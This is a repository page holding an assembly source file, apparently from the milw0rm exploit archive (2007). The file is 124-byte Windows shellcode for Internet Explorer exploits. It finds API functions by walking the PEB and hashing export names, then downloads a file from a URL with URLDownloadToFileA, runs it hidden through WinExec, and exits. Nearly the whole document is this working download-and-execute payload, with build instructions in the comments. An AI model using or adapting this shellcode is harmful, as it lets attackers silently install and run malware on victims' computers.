FilesExpand file tree

 master

/

13517.asm

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

150 lines (133 loc) · 5.2 KB

 master

/

13517.asm

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

150 lines (133 loc) · 5.2 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

;

; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***

; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!

;

; to test use /DTEST_CODE in ml command line

;

; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread()

;

; 124 bytes

;

; for testing:

;

; ml /c /coff /Cp /DTEST_CODE dexec32.asm

; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib

;

; wyse101 [at] gmail.com

;

; March 2007

;

.386

.model flat,stdcall

ROL_CONSTANT equ 5

mrol macro iNum:req,iBits:req

exitm <(iNum shl iBits) or (iNum shr (32-iBits))>

endm

mror macro iNum:req,iBits:req

exitm <(iNum shr iBits) or (iNum shl (32-iBits))>

endm

hashapi macro szApi

local dwApi

dwApi = 0

forc x,szApi

dwApi = dwApi + '&x'

dwApi = mrol(dwApi,ROL_CONSTANT)

endm

dwApi = mrol(dwApi,ROL_CONSTANT)

dw (dwApi and 0ffffh)

endm

.code

assume fs:nothing

code_start:

jmp load_data

IFDEF TEST_CODE

extern URLDownloadToFileA :proc

call URLDownloadToFileA ; included when assembled with /DTEST_CODE

ENDIF

setup_parameters:

pop edi ; offset @cmd_start

xor eax,eax ; eax = 0

cdq ; edx = 0

; ********************************************************************

push eax ; exit code = 0

; ********************************************************************

push eax ; SW_HIDE

mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes

push edi ; file name to execute

; ********************************************************************

push eax ; callback routine URLDownLoadToFileA

push eax ; reserved, must be zero

push edi ; file name to save as

add edi,edx ; get offset of @url_start-1

stosb ; zero tail end

mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url

push edi ; url to download file from

push eax ; interface

add edi,edx ; get offset of @urlmon-1

stosb ; zero tail end of url

; *********************************************************************

load_modules:

push edi ; save current offset to hashes

push 30h

pop ecx

mov eax,fs:[ecx] ; PEB base address

mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData

mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList

scan_dll:

mov ebx,[ebp+8] ; DllBase

mov ebp,[ebp] ; Flink

push ebp ; save

mov eax,[ebx+3ch]

mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT

lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames

lodsd

xchg eax,ecx ; ecx = NumberOfNames

lodsd

add eax,ebx ; AddressOfFunctions

push eax

lodsd

lea edi,[eax+ebx] ; AddressOfNames

lodsd

lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals

load_api:

mov esi,[edi+4*ecx-4]

add esi,ebx

xor eax,eax

cdq

hash_api:

lodsb

add edx,eax

rol edx,ROL_CONSTANT

dec eax

jns hash_api

mov esi,[esp+8] ; get api hashes

cmp dx,word ptr[esi] ; found a match?

je call_api

loop load_api

pop eax ; check

pop ebp ;

jmp scan_dll

call_api:

pop eax

movzx edx,word ptr [ebp+2*ecx-2]

add ebx,[eax+4*edx]

pop ebp ; modules

pop edi ; api hashes

call ebx ; call api

stosw ; advance 2 bytes to next hash

jmp load_modules ; do another, just keep going until ExitProcess is reached.

; *************************

load_data:

call setup_parameters

@cmd_start:

db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE);

@cmd_end:

@url_start:

db 'http://127.0.0.1/file.exe',0ffh ; url of file to download

@url_end:

hashapi <URLDownloadToFileA>

hashapi <WinExec>

hashapi <ExitProcess>

; *********************************************************************

end code_start

; milw0rm.com [2007-06-14]